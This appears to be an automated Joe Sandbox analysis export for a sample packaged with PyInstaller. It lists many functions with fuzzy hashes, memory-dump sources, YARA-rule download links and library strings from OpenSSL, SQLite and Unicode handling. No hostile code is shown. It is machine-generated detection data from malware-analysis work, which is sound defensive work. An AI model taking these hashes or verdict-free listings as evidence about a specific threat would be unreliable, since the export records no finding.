                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: %s.%s$column%d$rowid
                                                                                                                                                                                                                                              • API String ID: 0-1505470444
                                                                                                                                                                                                                                              • Opcode ID: 30ee24403bbbe39b15dc8828bd75070d7d44f9a04dc3d048d0a1485fb1bb9eaf
                                                                                                                                                                                                                                              • Instruction ID: c2b7d12cfdd951f47a4b4b3f80096df34a2817c6fba12d64b491535a5cba8940
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 30ee24403bbbe39b15dc8828bd75070d7d44f9a04dc3d048d0a1485fb1bb9eaf
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 12918722A09B8285EB20DB15D4443BE67A4FB89BB8F464336DAAD4B7E5DF3CD441C300
                                                                                                                                                                                                                                              Function 00007FFE013289A0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 192COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFE01300000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120031328.00007FFE01300000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01461000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01463000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01478000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120284056.00007FFE0147A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120315849.00007FFE0147C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe01300000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                              • API String ID: 0-3727861699
                                                                                                                                                                                                                                              • Opcode ID: ac59a9cb4a734ac58b84e693e8c4ebf4f1f7077b93233f305f08416909222bbb
                                                                                                                                                                                                                                              • Instruction ID: f16ee2ca609366ee503a9389fc2aae530acb25968bb2cea18c858a21eccf3415
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ac59a9cb4a734ac58b84e693e8c4ebf4f1f7077b93233f305f08416909222bbb
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ED811A72B086D18AEB649B25D1806BEBBE0FB50B84F064176DB8E4B661CF3CE455C741
                                                                                                                                                                                                                                              Function 00007FFE0078F070 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 172COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2119745990.00007FFE00761000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00760000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119715206.00007FFE00760000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE0080D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00818000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00823000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119967268.00007FFE00827000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119999506.00007FFE00829000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe00760000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: 00007
                                                                                                                                                                                                                                              • String ID: ..\s\ssl\ssl_sess.c$SSL_SESSION_new$ssl_get_new_session
                                                                                                                                                                                                                                              • API String ID: 3568877910-2527649602
                                                                                                                                                                                                                                              • Opcode ID: 81de3dcb5b9a74f6d10349495346cbec55276295be6eb05afdb2b4af8c059850
                                                                                                                                                                                                                                              • Instruction ID: fa2738c9ea9e3ace1e8355c00f1c945bf253654dd644681d0a7d540be36313b5
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 81de3dcb5b9a74f6d10349495346cbec55276295be6eb05afdb2b4af8c059850
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E1718D21B0AA8282EB54FB65D9543BD22A0FB84B84F5C4136DB5D5B7EEDF3CE9418301
                                                                                                                                                                                                                                              Function 00007FFE00762469 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 172COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2119745990.00007FFE00761000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00760000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119715206.00007FFE00760000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE0080D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00818000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00823000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119967268.00007FFE00827000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119999506.00007FFE00829000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe00760000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: 00007A461250
                                                                                                                                                                                                                                              • String ID: ..\s\ssl\statem\extensions_srvr.c$D:\a\1\s\include\internal/packet.h$tls_parse_ctos_server_name
                                                                                                                                                                                                                                              • API String ID: 909805961-4157686371
                                                                                                                                                                                                                                              • Opcode ID: df7c5cc1c5450ab236299e71f02084b029a770e3f54b11b68fceadd1af193070
                                                                                                                                                                                                                                              • Instruction ID: c5901cbfc20cf75062b2a2e5b7388a700d6a7dff1ef71f7ab063648b7ca29363
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: df7c5cc1c5450ab236299e71f02084b029a770e3f54b11b68fceadd1af193070
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7461D321F0EA9681F771BB61D4007B96391EF85B84F4C4132DB8D57BAEEE6CE9908700
                                                                                                                                                                                                                                              Function 00007FF6B750D648 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                                                              • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                                              • Opcode ID: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                                                                                                                                                                              • Instruction ID: 2a6e29ca6118db7ebf224c583c939c08d5583424a0c3414f13170ac969fe1405
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1A518B77A1D7428AEB248B19E448B787391EB44B98F518134EB4EC77A8EF7DE841D700
                                                                                                                                                                                                                                              Function 00007FFE0133C5E7 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 149COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFE01300000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120031328.00007FFE01300000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01461000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01463000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01478000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120284056.00007FFE0147A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120315849.00007FFE0147C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe01300000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: 00007A463010
                                                                                                                                                                                                                                              • String ID: out of memory$string or blob too big
                                                                                                                                                                                                                                              • API String ID: 4225454184-2410398255
                                                                                                                                                                                                                                              • Opcode ID: 32c2ae49c0d43b0bf73bf14441e4c9b52f205afacfc25aad9bb6812841d0f57a
                                                                                                                                                                                                                                              • Instruction ID: 4133e15473d5bd79377da8d0d471b2516140e1ae38c902949b9c79103d0ec66a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 32c2ae49c0d43b0bf73bf14441e4c9b52f205afacfc25aad9bb6812841d0f57a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C361BE66B0869282E7149B26E14027EA7A0FF45F94F164036EF8D1BBB9CF3CE4529714
                                                                                                                                                                                                                                              Function 00007FF6B750EED8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                              • String ID: MOC$RCC
                                                                                                                                                                                                                                              • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                              • Opcode ID: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                                                                                                                                                                              • Instruction ID: 0dca6f276b202735388ca35439d1dfa12fd42c77ab39edb388c470d84faeb9dd
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D361813390CBC585DB709B19E4407AAB7A0FB85798F144225EB9D83BA9DF7CD190CB00
                                                                                                                                                                                                                                              Function 00007FF6B750F288 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                              • String ID: csm$csm
                                                                                                                                                                                                                                              • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                              • Opcode ID: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                                                                                                                                                                              • Instruction ID: 347cc6605aa26888af7f23de5ebe77f6d11b9cd7a242246b2218f23e557e36dd
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FF516C73A0C3868AEB648B299854A6877A0FB55B98F144136DB8D87BE5CF3CE451C701
                                                                                                                                                                                                                                              Function 00007FFE01308417 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 128COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFE01300000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120031328.00007FFE01300000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01461000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01463000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120062918.00007FFE01478000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120284056.00007FFE0147A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2120315849.00007FFE0147C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe01300000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: 00007A463010
                                                                                                                                                                                                                                              • String ID: (join-%u)$(subquery-%u)
                                                                                                                                                                                                                                              • API String ID: 4225454184-2916047017
                                                                                                                                                                                                                                              • Opcode ID: e4b271abe33ea453b0af829f0d0b3c64b2499140cc847aae9644bee38be7c82c
                                                                                                                                                                                                                                              • Instruction ID: 3172d41a05741d463bc46c4202d3170ff758164c5e920864c888d59cc0cec051
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e4b271abe33ea453b0af829f0d0b3c64b2499140cc847aae9644bee38be7c82c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 42510272F1864281EB62CA65D06473927E1FB04BA0F4746B9CA3D0B3F9DF2DE8418740
                                                                                                                                                                                                                                              Function 00007FFDFAE621E0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 115COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116621230.00007FFDFAE61000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FFDFAE60000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116507686.00007FFDFAE60000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116621230.00007FFDFAEAA000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116621230.00007FFDFAEB8000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116621230.00007FFDFAF07000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116621230.00007FFDFAF0C000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116621230.00007FFDFAF0F000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117242370.00007FFDFAF10000.00000080.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117294434.00007FFDFAF12000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfae60000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: 00007B6570
                                                                                                                                                                                                                                              • String ID: CJK UNIFIED IDEOGRAPH-$HANGUL SYLLABLE
                                                                                                                                                                                                                                              • API String ID: 4069847057-87138338
                                                                                                                                                                                                                                              • Opcode ID: a963b875801d9843ea49cd289ad9d5ca77fa3890532c8e824ee28ee48ef07934
                                                                                                                                                                                                                                              • Instruction ID: 70d793f23d9f32deca3c5870d7907b8680c0c05067fd366b68621030ac627b06
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a963b875801d9843ea49cd289ad9d5ca77fa3890532c8e824ee28ee48ef07934
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BD414572F2C74286EB28AF18E414A697751EB81B90F444630EAAF47BDDDF3DE4058B40
                                                                                                                                                                                                                                              Function 00007FFE007619DD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2119745990.00007FFE00761000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00760000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119715206.00007FFE00760000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE0080D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00818000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00823000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119967268.00007FFE00827000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119999506.00007FFE00829000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe00760000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: 00007
                                                                                                                                                                                                                                              • String ID: ..\s\ssl\tls_srp.c
                                                                                                                                                                                                                                              • API String ID: 3568877910-1778748169
                                                                                                                                                                                                                                              • Opcode ID: 5de455a0e33419aeed79645b2a849e8fb5092a76a7a5c4db12254346f5210564
                                                                                                                                                                                                                                              • Instruction ID: 8b6517fbce4d300748b82099fa9ab081dd25f3e367956e5cb44124db3375aba6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5de455a0e33419aeed79645b2a849e8fb5092a76a7a5c4db12254346f5210564
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5A411221A0BA8384FE54BF59955077822A1BF82F84F1D4536EF5D4B7AEDF3CA8128310
                                                                                                                                                                                                                                              Function 00007FF6B7507E20 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(00000000,?,00007FF6B750352C,?,00000000,00007FF6B7503F23), ref: 00007FF6B7507F32
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CreateDirectory
                                                                                                                                                                                                                                              • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                                              • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                                              • Opcode ID: a1c59376f93c8b4c6db0aee125681cb96c2ab9e1787ffa8cf6eb7b68f1c1c36c
                                                                                                                                                                                                                                              • Instruction ID: 2d830b80e12cbc9dbe8d8da00474cc222322cf14f104e082e1db06b220a04172
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a1c59376f93c8b4c6db0aee125681cb96c2ab9e1787ffa8cf6eb7b68f1c1c36c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D131E66271DAC145EA218B28E4503EA6358EF84BE8F440631EF6D877E9DF3CD6458700
                                                                                                                                                                                                                                              Function 00007FF6B7502810 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 65windowCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Message
                                                                                                                                                                                                                                              • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                                                                                                                                                                              • API String ID: 2030045667-255084403
                                                                                                                                                                                                                                              • Opcode ID: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                                                                                                                                                                              • Instruction ID: 0951eebf42bbb2f49d1416f930d09a427540ecae0a2d2a0830ecf9075305326d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F921AE63B0CB8182E7219B58F8447EA63A4FB88784F400136EF8D97669EE3CE245C740
                                                                                                                                                                                                                                              Function 00007FF6B751C5A0 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
